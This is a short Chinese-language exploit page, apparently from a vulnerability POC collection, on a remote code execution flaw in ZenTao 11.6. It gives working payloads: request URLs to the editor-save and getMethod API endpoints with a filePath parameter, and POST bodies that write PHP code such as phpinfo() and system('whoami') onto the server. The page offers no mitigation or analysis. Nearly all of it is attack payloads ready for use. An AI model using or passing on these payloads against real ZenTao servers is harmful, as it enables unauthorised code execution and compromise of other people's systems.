跳转至

禅道11.6RCE漏洞

漏洞范围

禅道 11.6

漏洞POC

文件写入

漏洞范围

禅道 11.6

漏洞POC

三.远程代码执行漏洞

1)远程代码执行命令phpnifo();

Payload 1:

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111

POST: fileContent=<?php phpinfo(); ?>

img

Payload2:

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=1111/1

POST: fileContent=<?php phpinfo(); ?>

img

2)远程代码执行命令system('whoami');

Payload 1:

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222

POST: fileContent=<?php system('whoami'); ?>

img

Payload 2:

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=2222/2

POST: fileContent=<?php system('whoami'); ?>

img